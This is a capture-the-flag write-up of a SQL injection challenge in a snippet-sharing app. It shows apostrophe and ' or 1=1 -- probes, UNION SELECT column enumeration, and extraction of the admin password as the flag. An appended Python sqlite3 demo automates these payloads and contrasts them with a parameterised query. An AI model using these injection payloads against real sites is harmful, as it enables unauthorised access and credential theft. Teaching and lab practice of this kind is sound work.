Copypasta (SQLi)

Step 1: Register
Register and head over to “Public” and find a public snippet to work with.

Select “Share” and take the resulting snippet URL:

Step 2: Test for SQLi
Append an apostrophe to the snippet ID in the share URL and the snippet will not be found, which suggests the quote is breaking the underlying query:

Remove the apostrophe and the snippet will be found:

From here, I continued in Firefox with the HackBar extension. I tried a ' or 1=1 -- payload and the page loaded normally, so I was certain we were dealing with SQLi.

Next I worked out the number of columns in the original query with a UNION SELECT, adding one placeholder per column (I tried 8, then 7, and neither worked; 6, however, did):

I hit execute and was given the column names: id, title, code, language, description and username:

Ok now, why did I use ‘x’ after /share/? Because a snippet with that ID doesn’t exist. If we keep the valid ID, the page still returns data, but not the data we want: the query matches the real share string and renders that snippet instead of our injected row. With a non-existent ID the original query returns nothing, so the only row left to render is the one our UNION supplies. So, let’s replace it again with x' followed by the rest of the payload.

The following payload pulled the admin user’s row from the users table and placed its values into columns 2 and 3 of the snippet output. In column 3, we see the flag:
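To make the steps above concrete, here is an added example that is not part of the original writeup: a small sqlite3 model of the vulnerable share lookup, the apostrophe and ' or 1=1 -- probes, the UNION column-count enumeration, and the final extraction from the users table, alongside a parameterised version that defeats the same payloads. The six snippet columns are the ones listed above; the share token column, the users table layout (id, username, password), the token values and the flag string are all constructed assumptions for illustration.

```python
import sqlite3

# Constructed sample database. Only the six selected snippet columns come
# from the writeup; the share column, the users table layout, the tokens
# and the flag value are assumptions made for this example.
SNIPPET_COLUMNS = ("id", "title", "code", "language", "description", "username")


def build_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE snippets (
            id INTEGER, title TEXT, code TEXT, language TEXT,
            description TEXT, username TEXT, share TEXT
        );
        CREATE TABLE users (id INTEGER, username TEXT, password TEXT);
        INSERT INTO snippets VALUES
            (1, 'hello', 'print(1)', 'python', 'demo snippet', 'alice', 'abc123');
        INSERT INTO users VALUES
            (1, 'alice', 'alice-pass'),
            (2, 'admin', 'FLAG{constructed-example-flag}');
    """)
    return conn


def find_snippet_vulnerable(conn, share):
    """String-concatenated lookup: the pattern the writeup exploits.
    A SQL error is swallowed and shown to the user as 'snippet not found',
    which is why a lone apostrophe makes the snippet disappear."""
    sql = ("SELECT id, title, code, language, description, username "
           f"FROM snippets WHERE share = '{share}'")
    try:
        return conn.execute(sql).fetchone()
    except sqlite3.Error:
        return None


def find_snippet_safe(conn, share):
    """Same query with the token bound as a parameter; the input can never
    change the statement's structure, so UNION payloads are just a bad token."""
    sql = ("SELECT id, title, code, language, description, username "
           "FROM snippets WHERE share = ?")
    return conn.execute(sql, (share,)).fetchone()


def count_columns(conn, max_cols=10):
    """Column-count enumeration: a UNION SELECT with N NULLs only executes
    when N equals the column count of the original SELECT (here 6). The
    'x' token matches nothing, so a successful probe returns the NULL row."""
    for n in range(1, max_cols + 1):
        nulls = ", ".join(["NULL"] * n)
        row = find_snippet_vulnerable(conn, f"x' UNION SELECT {nulls}-- ")
        if row is not None:
            return n
    return None


def dump_admin(conn):
    """Final step: land the admin user's username and password in output
    columns 2 and 3 (title and code) so the page renders them for us."""
    payload = ("x' UNION SELECT 1, username, password, 4, 5, 6 "
               "FROM users WHERE username = 'admin'-- ")
    return find_snippet_vulnerable(conn, payload)


if __name__ == "__main__":
    db = build_db()
    print("valid token:", find_snippet_vulnerable(db, "abc123"))
    print("token + apostrophe:", find_snippet_vulnerable(db, "abc123'"))
    print("or 1=1 probe:", find_snippet_vulnerable(db, "x' or 1=1-- "))
    print("column count:", count_columns(db))
    row = dump_admin(db)
    print("column 2:", row[1], "| column 3:", row[2])
    print("safe lookup with payload:", find_snippet_safe(db, "x' UNION SELECT 1,2,3,4,5,6-- "))
```

The reason the 'x' matters is visible in count_columns and dump_admin: with the real token the first half of the UNION already yields a row and the page renders that instead, whereas a non-existent token leaves only the injected row. Note that the table holds seven columns but the query selects six, so the count to match is the SELECT list, not the table width.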

Thanks for reading!